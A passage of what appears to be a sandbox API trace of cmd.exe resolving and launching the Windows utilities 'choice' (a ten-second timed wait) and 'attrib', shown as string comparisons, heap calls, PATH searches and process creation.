_wcsicmp (_String1="choice", _String2="DPATH") returned -1 [0250.364] _wcsicmp (_String1="choice", _String2="KEYS") returned -8 [0250.364] _wcsicmp (_String1="choice", _String2="MOVE") returned -10 [0250.364] _wcsicmp (_String1="choice", _String2="PUSHD") returned -13 [0250.364] _wcsicmp (_String1="choice", _String2="POPD") returned -13 [0250.364] _wcsicmp (_String1="choice", _String2="ASSOC") returned 2 [0250.364] _wcsicmp (_String1="choice", _String2="FTYPE") returned -3 [0250.364] _wcsicmp (_String1="choice", _String2="BREAK") returned 1 [0250.365] _wcsicmp (_String1="choice", _String2="COLOR") returned -7 [0250.365] _wcsicmp (_String1="choice", _String2="MKLINK") returned -10 [0250.365] _wcsicmp (_String1="choice", _String2="FOR") returned -3 [0250.365] _wcsicmp (_String1="choice", _String2="IF") returned -6 [0250.365] _wcsicmp (_String1="choice", _String2="REM") returned -15 [0250.365] ??_V@YAXPAX@Z () returned 0x1 [0250.365] GetProcessHeap () returned 0x3360000 [0250.365] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0xffd6) returned 0x337de68 [0250.367] GetProcessHeap () returned 0x3360000 [0250.367] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x30) returned 0x336fcf0 [0250.367] _wcsnicmp (_String1="choi", _String2="cmd ", _MaxCount=0x4) returned -5 [0250.367] malloc (_Size=0xffce) returned 0x4c22d30 [0250.367] ??_V@YAXPAX@Z () returned 0x2daee84 [0250.367] GetProcessHeap () returned 0x3360000 [0250.367] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x1ffa4) returned 0x338de48 [0250.370] SetErrorMode (uMode=0x0) returned 0x0 [0250.370] SetErrorMode (uMode=0x1) returned 0x0 [0250.370] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x338de50, lpFilePart=0x2daeea4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x2daeea4*="Desktop") returned 0x17 [0250.370] SetErrorMode (uMode=0x0) returned 0x1 [0250.370] GetProcessHeap () returned 0x3360000 [0250.370] RtlReAllocateHeap (Heap=0x3360000, Flags=0x0, Ptr=0x338de48, Size=0x46) returned 0x338de48 [0250.371] GetProcessHeap () returned 0x3360000 [0250.371] RtlSizeHeap (HeapHandle=0x3360000, Flags=0x0, MemoryPointer=0x338de48) returned 0x46 [0250.371] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xabf840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0250.371] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0250.371] GetProcessHeap () returned 0x3360000 [0250.371] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x1b4) returned 0x337cb70 [0250.379] GetProcessHeap () returned 0x3360000 [0250.380] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x360) returned 0x337cd30 [0250.388] GetProcessHeap () returned 0x3360000 [0250.388] RtlReAllocateHeap (Heap=0x3360000, Flags=0x0, Ptr=0x337cd30, Size=0x1b6) returned 0x337cd30 [0250.388] GetProcessHeap () returned 0x3360000 [0250.388] RtlSizeHeap (HeapHandle=0x3360000, Flags=0x0, MemoryPointer=0x337cd30) returned 0x1b6 [0250.388] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xabf840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0250.388] GetProcessHeap () returned 0x3360000 [0250.388] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0xe0) returned 0x337cef0 [0250.388] GetProcessHeap () returned 0x3360000 [0250.388] RtlReAllocateHeap (Heap=0x3360000, Flags=0x0, Ptr=0x337cef0, Size=0x76) returned 0x337cef0 [0250.388] GetProcessHeap () returned 0x3360000 [0250.388] RtlSizeHeap (HeapHandle=0x3360000, Flags=0x0, MemoryPointer=0x337cef0) returned 0x76 [0250.389] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0250.389] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\choice.*", fInfoLevelId=0x1, lpFindFileData=0x2daec30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2daec30) returned 0xffffffff [0250.389] GetLastError () returned 0x2 [0250.390] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0250.390] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\choice.*", fInfoLevelId=0x1, lpFindFileData=0x2daec30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2daec30) returned 0xffffffff [0250.390] GetLastError () returned 0x2 [0250.390] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0250.390] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\choice.*", fInfoLevelId=0x1, lpFindFileData=0x2daec30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2daec30) returned 0x3377350 [0250.390] GetProcessHeap () returned 0x3360000 [0250.390] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x0, Size=0x14) returned 0x33753e0 [0250.390] FindClose (in: hFindFile=0x3377350 | out: hFindFile=0x3377350) returned 1 [0250.391] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\choice.COM", fInfoLevelId=0x1, lpFindFileData=0x2daec30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2daec30) returned 0xffffffff [0250.391] GetLastError () returned 0x2 [0250.391] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\choice.EXE", fInfoLevelId=0x1, lpFindFileData=0x2daec30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2daec30) returned 0x3377350 [0250.391] GetProcessHeap () returned 0x3360000 [0250.391] RtlReAllocateHeap (Heap=0x3360000, Flags=0x0, Ptr=0x33753e0, Size=0x4) returned 0x3375068 [0250.391] FindClose (in: hFindFile=0x3377350 | out: hFindFile=0x3377350) returned 1 [0250.391] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0250.391] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0250.391] ??_V@YAXPAX@Z () returned 0x1 [0250.391] GetConsoleTitleW (in: lpConsoleTitle=0x2daf134, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe") returned 0x1c [0250.543] InitializeProcThreadAttributeList (in: lpAttributeList=0x2daf060, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2daf04c | out: lpAttributeList=0x2daf060, lpSize=0x2daf04c) returned 1 [0250.544] UpdateProcThreadAttribute (in: lpAttributeList=0x2daf060, dwFlags=0x0, Attribute=0x60001, lpValue=0x2daf048, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2daf060, lpPreviousValue=0x0) returned 1 [0250.544] GetStartupInfoW (in: lpStartupInfo=0x2daf098 | out: lpStartupInfo=0x2daf098*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0250.544] GetProcessHeap () returned 0x3360000 [0250.544] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x18) returned 0x3375540 [0250.544] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0250.544] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0250.544] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0250.544] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0250.544] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0250.544] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0250.544] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0250.544] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0250.544] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0250.544] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0250.544] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0250.545] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0250.545] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0250.545] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0250.545] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0250.545] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0250.545] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0250.545] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0250.545] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0250.545] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0250.545] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0250.545] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0250.545] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0250.545] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0250.545] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0250.545] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0250.545] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0250.545] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0250.545] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0250.545] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0250.545] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0250.545] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0250.545] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0250.545] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0250.545] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0250.545] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0250.545] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0250.545] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0250.546] _wcsnicmp (_String1="COPYCMD", _String2="__COMPA", _MaxCount=0x7) returned 4 [0250.546] GetProcessHeap () returned 0x3360000 [0250.546] RtlFreeHeap (HeapHandle=0x3360000, Flags=0x0, BaseAddress=0x3375540) returned 1 [0250.546] GetProcessHeap () returned 0x3360000 [0250.546] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0xa) returned 0x3370eb0 [0250.546] lstrcmpW (lpString1="\\choice.exe", lpString2="\\XCOPY.EXE") returned -1 [0250.547] _get_osfhandle (_FileHandle=1) returned 0x90 [0250.547] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x3) returned 1 [0250.668] _get_osfhandle (_FileHandle=0) returned 0x8c [0250.668] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1f7) returned 1 [0251.043] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\choice.exe", lpCommandLine="choice /t 10 /d y ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x2daefe8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="choice /t 10 /d y ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2daf034 | out: lpCommandLine="choice /t 10 /d y ", lpProcessInformation=0x2daf034*(hProcess=0x254, hThread=0x250, dwProcessId=0x1150, dwThreadId=0xd88)) returned 1 [0251.073] CloseHandle (hObject=0x250) returned 1 [0251.073] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0251.073] GetProcessHeap () returned 0x3360000 [0251.073] RtlFreeHeap (HeapHandle=0x3360000, Flags=0x0, BaseAddress=0x337bc88) returned 1 [0251.073] GetEnvironmentStringsW () returned 0x337bc88* [0251.073] GetProcessHeap () returned 0x3360000 [0251.073] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0xb62) returned 0x3379b28 [0251.074] FreeEnvironmentStringsA (penv="=") returned 1 [0251.074] WaitForSingleObject (hHandle=0x254, dwMilliseconds=0xffffffff) returned 0x0 [0264.315] GetExitCodeProcess (in: hProcess=0x254, lpExitCode=0x2daefcc | out: lpExitCode=0x2daefcc*=0x1) returned 1 [0264.316] CloseHandle (hObject=0x254) returned 1 [0264.316] _vsnwprintf (in: _Buffer=0x2daf0b4, _BufferCount=0x13, _Format="%08X", _ArgList=0x2daefd4 | out: _Buffer="00000001") returned 8 [0264.316] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0264.316] GetProcessHeap () returned 0x3360000 [0264.316] RtlFreeHeap (HeapHandle=0x3360000, Flags=0x0, BaseAddress=0x3379b28) returned 1 [0264.316] GetEnvironmentStringsW () returned 0x3379b28* [0264.316] GetProcessHeap () returned 0x3360000 [0264.316] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0xb88) returned 0x337d0a0 [0264.316] FreeEnvironmentStringsA (penv="=") returned 1 [0264.316] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0264.316] GetProcessHeap () returned 0x3360000 [0264.316] RtlFreeHeap (HeapHandle=0x3360000, Flags=0x0, BaseAddress=0x337d0a0) returned 1 [0264.316] GetEnvironmentStringsW () returned 0x3379b28* [0264.316] GetProcessHeap () returned 0x3360000 [0264.316] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0xb88) returned 0x337d0a0 [0264.316] FreeEnvironmentStringsA (penv="=") returned 1 [0264.316] GetProcessHeap () returned 0x3360000 [0264.316] RtlFreeHeap (HeapHandle=0x3360000, Flags=0x0, BaseAddress=0x3370eb0) returned 1 [0264.316] DeleteProcThreadAttributeList (in: lpAttributeList=0x2daf060 | out: lpAttributeList=0x2daf060) [0264.316] ??_V@YAXPAX@Z () returned 0x1 [0264.316] GetConsoleTitleW (in: lpConsoleTitle=0x2daf560, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe") returned 0x1c [0264.430] malloc (_Size=0xffce) returned 0x4c12d58 [0264.430] ??_V@YAXPAX@Z () returned 0x2daf2ec [0264.430] malloc (_Size=0xffce) returned 0x4c22d30 [0264.430] ??_V@YAXPAX@Z () returned 0x2daf0a4 [0264.431] _wcsicmp (_String1="attrib", _String2="DIR") returned -3 [0264.431] _wcsicmp (_String1="attrib", _String2="ERASE") returned -4 [0264.431] _wcsicmp (_String1="attrib", _String2="DEL") returned -3 [0264.431] _wcsicmp (_String1="attrib", _String2="TYPE") returned -19 [0264.431] _wcsicmp (_String1="attrib", _String2="COPY") returned -2 [0264.431] _wcsicmp (_String1="attrib", _String2="CD") returned -2 [0264.431] _wcsicmp (_String1="attrib", _String2="CHDIR") returned -2 [0264.431] _wcsicmp (_String1="attrib", _String2="RENAME") returned -17 [0264.431] _wcsicmp (_String1="attrib", _String2="REN") returned -17 [0264.431] _wcsicmp (_String1="attrib", _String2="ECHO") returned -4 [0264.431] _wcsicmp (_String1="attrib", _String2="SET") returned -18 [0264.431] _wcsicmp (_String1="attrib", _String2="PAUSE") returned -15 [0264.431] _wcsicmp (_String1="attrib", _String2="DATE") returned -3 [0264.431] _wcsicmp (_String1="attrib", _String2="TIME") returned -19 [0264.431] _wcsicmp (_String1="attrib", _String2="PROMPT") returned -15 [0264.431] _wcsicmp (_String1="attrib", _String2="MD") returned -12 [0264.431] _wcsicmp (_String1="attrib", _String2="MKDIR") returned -12 [0264.431] _wcsicmp (_String1="attrib", _String2="RD") returned -17 [0264.431] _wcsicmp (_String1="attrib", _String2="RMDIR") returned -17 [0264.432] _wcsicmp (_String1="attrib", _String2="PATH") returned -15 [0264.432] _wcsicmp (_String1="attrib", _String2="GOTO") returned -6 [0264.432] _wcsicmp (_String1="attrib", _String2="SHIFT") returned -18 [0264.432] _wcsicmp (_String1="attrib", _String2="CLS") returned -2 [0264.432] _wcsicmp (_String1="attrib", _String2="CALL") returned -2 [0264.432] _wcsicmp (_String1="attrib", _String2="VERIFY") returned -21 [0264.432] _wcsicmp (_String1="attrib", _String2="VER") returned -21 [0264.432] _wcsicmp (_String1="attrib", _String2="VOL") returned -21 [0264.432] _wcsicmp (_String1="attrib", _String2="EXIT") returned -4 [0264.432] _wcsicmp (_String1="attrib", _String2="SETLOCAL") returned -18 [0264.432] _wcsicmp (_String1="attrib", _String2="ENDLOCAL") returned -4 [0264.432] _wcsicmp (_String1="attrib", _String2="TITLE") returned -19 [0264.432] _wcsicmp (_String1="attrib", _String2="START") returned -18 [0264.432] _wcsicmp (_String1="attrib", _String2="DPATH") returned -3 [0264.432] _wcsicmp (_String1="attrib", _String2="KEYS") returned -10 [0264.432] _wcsicmp (_String1="attrib", _String2="MOVE") returned -12 [0264.432] _wcsicmp (_String1="attrib", _String2="PUSHD") returned -15 [0264.432] _wcsicmp (_String1="attrib", _String2="POPD") returned -15 [0264.432] _wcsicmp (_String1="attrib", _String2="ASSOC") returned 1 [0264.432] _wcsicmp (_String1="attrib", _String2="FTYPE") returned -5 [0264.432] _wcsicmp (_String1="attrib", _String2="BREAK") returned -1 [0264.432] _wcsicmp (_String1="attrib", _String2="COLOR") returned -2 [0264.432] _wcsicmp (_String1="attrib", _String2="MKLINK") returned -12 [0264.432] _wcsicmp (_String1="attrib", _String2="DIR") returned -3 [0264.432] _wcsicmp (_String1="attrib", _String2="ERASE") returned -4 [0264.432] _wcsicmp (_String1="attrib", _String2="DEL") returned -3 [0264.432] _wcsicmp (_String1="attrib", _String2="TYPE") returned -19 [0264.433] _wcsicmp (_String1="attrib", _String2="COPY") returned -2 [0264.433] _wcsicmp (_String1="attrib", _String2="CD") returned -2 [0264.433] _wcsicmp (_String1="attrib", _String2="CHDIR") returned -2 [0264.433] _wcsicmp (_String1="attrib", _String2="RENAME") returned -17 [0264.433] _wcsicmp (_String1="attrib", _String2="REN") returned -17 [0264.433] _wcsicmp (_String1="attrib", _String2="ECHO") returned -4 [0264.433] _wcsicmp (_String1="attrib", _String2="SET") returned -18 [0264.433] _wcsicmp (_String1="attrib", _String2="PAUSE") returned -15 [0264.433] _wcsicmp (_String1="attrib", _String2="DATE") returned -3 [0264.433] _wcsicmp (_String1="attrib", _String2="TIME") returned -19 [0264.433] _wcsicmp (_String1="attrib", _String2="PROMPT") returned -15 [0264.433] _wcsicmp (_String1="attrib", _String2="MD") returned -12 [0264.433] _wcsicmp (_String1="attrib", _String2="MKDIR") returned -12 [0264.433] _wcsicmp (_String1="attrib", _String2="RD") returned -17 [0264.433] _wcsicmp (_String1="attrib", _String2="RMDIR") returned -17 [0264.433] _wcsicmp (_String1="attrib", _String2="PATH") returned -15 [0264.433] _wcsicmp (_String1="attrib", _String2="GOTO") returned -6 [0264.433] _wcsicmp (_String1="attrib", _String2="SHIFT") returned -18 [0264.433] _wcsicmp (_String1="attrib", _String2="CLS") returned -2 [0264.433] _wcsicmp (_String1="attrib", _String2="CALL") returned -2 [0264.433] _wcsicmp (_String1="attrib", _String2="VERIFY") returned -21 [0264.433] _wcsicmp (_String1="attrib", _String2="VER") returned -21 [0264.433] _wcsicmp (_String1="attrib", _String2="VOL") returned -21 [0264.433] _wcsicmp (_String1="attrib", _String2="EXIT") returned -4 [0264.433] _wcsicmp (_String1="attrib", _String2="SETLOCAL") returned -18 [0264.433] _wcsicmp (_String1="attrib", _String2="ENDLOCAL") returned -4 [0264.433] _wcsicmp (_String1="attrib", _String2="TITLE") returned -19 [0264.434] _wcsicmp (_String1="attrib", _String2="START") returned -18 [0264.434] _wcsicmp (_String1="attrib", _String2="DPATH") returned -3 [0264.434] _wcsicmp (_String1="attrib", _String2="KEYS") returned -10 [0264.434] _wcsicmp (_String1="attrib", _String2="MOVE") returned -12 [0264.434] _wcsicmp (_String1="attrib", _String2="PUSHD") returned -15 [0264.434] _wcsicmp (_String1="attrib", _String2="POPD") returned -15 [0264.434] _wcsicmp (_String1="attrib", _String2="ASSOC") returned 1 [0264.434] _wcsicmp (_String1="attrib", _String2="FTYPE") returned -5 [0264.434] _wcsicmp (_String1="attrib", _String2="BREAK") returned -1 [0264.434] _wcsicmp (_String1="attrib", _String2="COLOR") returned -2 [0264.434] _wcsicmp (_String1="attrib", _String2="MKLINK") returned -12 [0264.434] _wcsicmp (_String1="attrib", _String2="FOR") returned -5 [0264.434] _wcsicmp (_String1="attrib", _String2="IF") returned -8 [0264.434] _wcsicmp (_String1="attrib", _String2="REM") returned -17 [0264.434] ??_V@YAXPAX@Z () returned 0x1 [0264.434] GetProcessHeap () returned 0x3360000 [0264.434] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0xffd6) returned 0x338ea28 [0264.434] GetProcessHeap () returned 0x3360000 [0264.434] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x6c) returned 0x337dc30 [0264.434] _wcsnicmp (_String1="attr", _String2="cmd ", _MaxCount=0x4) returned -2 [0264.434] malloc (_Size=0xffce) returned 0x4c22d30 [0264.434] ??_V@YAXPAX@Z () returned 0x2daee24 [0264.435] GetProcessHeap () returned 0x3360000 [0264.435] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x1ffa4) returned 0x339ea08 [0264.438] SetErrorMode (uMode=0x0) returned 0x0 [0264.438] SetErrorMode (uMode=0x1) returned 0x0 [0264.438] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x339ea10, lpFilePart=0x2daee44 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x2daee44*="Desktop") returned 0x17 [0264.439] SetErrorMode (uMode=0x0) returned 0x1 [0264.439] GetProcessHeap () returned 0x3360000 [0264.439] RtlReAllocateHeap (Heap=0x3360000, Flags=0x0, Ptr=0x339ea08, Size=0x46) returned 0x339ea08 [0264.439] GetProcessHeap () returned 0x3360000 [0264.439] RtlSizeHeap (HeapHandle=0x3360000, Flags=0x0, MemoryPointer=0x339ea08) returned 0x46 [0264.439] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xabf840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0264.439] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0264.439] GetProcessHeap () returned 0x3360000 [0264.439] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x1b4) returned 0x337dca8 [0264.439] GetProcessHeap () returned 0x3360000 [0264.439] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x360) returned 0x337a8f8 [0264.439] GetProcessHeap () returned 0x3360000 [0264.439] RtlReAllocateHeap (Heap=0x3360000, Flags=0x0, Ptr=0x337a8f8, Size=0x1b6) returned 0x337a8f8 [0264.439] GetProcessHeap () returned 0x3360000 [0264.439] RtlSizeHeap (HeapHandle=0x3360000, Flags=0x0, MemoryPointer=0x337a8f8) returned 0x1b6 [0264.439] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xabf840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0264.439] GetProcessHeap () returned 0x3360000 [0264.439] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0xe0) returned 0x337aab8 [0264.439] GetProcessHeap () returned 0x3360000 [0264.439] RtlReAllocateHeap (Heap=0x3360000, Flags=0x0, Ptr=0x337aab8, Size=0x76) returned 0x337aab8 [0264.439] GetProcessHeap () returned 0x3360000 [0264.439] RtlSizeHeap (HeapHandle=0x3360000, Flags=0x0, MemoryPointer=0x337aab8) returned 0x76 [0264.440] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0264.440] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2daebd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2daebd0) returned 0xffffffff [0264.440] GetLastError () returned 0x2 [0264.440] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0264.440] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2daebd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2daebd0) returned 0xffffffff [0264.440] GetLastError () returned 0x2 [0264.440] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0264.441] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2daebd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2daebd0) returned 0x3377450 [0264.441] FindClose (in: hFindFile=0x3377450 | out: hFindFile=0x3377450) returned 1 [0264.441] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2daebd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2daebd0) returned 0xffffffff [0264.441] GetLastError () returned 0x2 [0264.441] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2daebd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2daebd0) returned 0x3377110 [0264.441] FindClose (in: hFindFile=0x3377110 | out: hFindFile=0x3377110) returned 1 [0264.441] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0264.441] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0264.442] ??_V@YAXPAX@Z () returned 0x1 [0264.442] GetConsoleTitleW (in: lpConsoleTitle=0x2daf0d4, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe") returned 0x1c [0264.675] InitializeProcThreadAttributeList (in: lpAttributeList=0x2daf000, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2daefec | out: lpAttributeList=0x2daf000, lpSize=0x2daefec) returned 1 [0264.675] UpdateProcThreadAttribute (in: lpAttributeList=0x2daf000, dwFlags=0x0, Attribute=0x60001, lpValue=0x2daefe8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2daf000, lpPreviousValue=0x0) returned 1 [0264.675] GetStartupInfoW (in: lpStartupInfo=0x2daf038 | out: lpStartupInfo=0x2daf038*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0264.676] GetProcessHeap () returned 0x3360000 [0264.676] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x18) returned 0x3375660 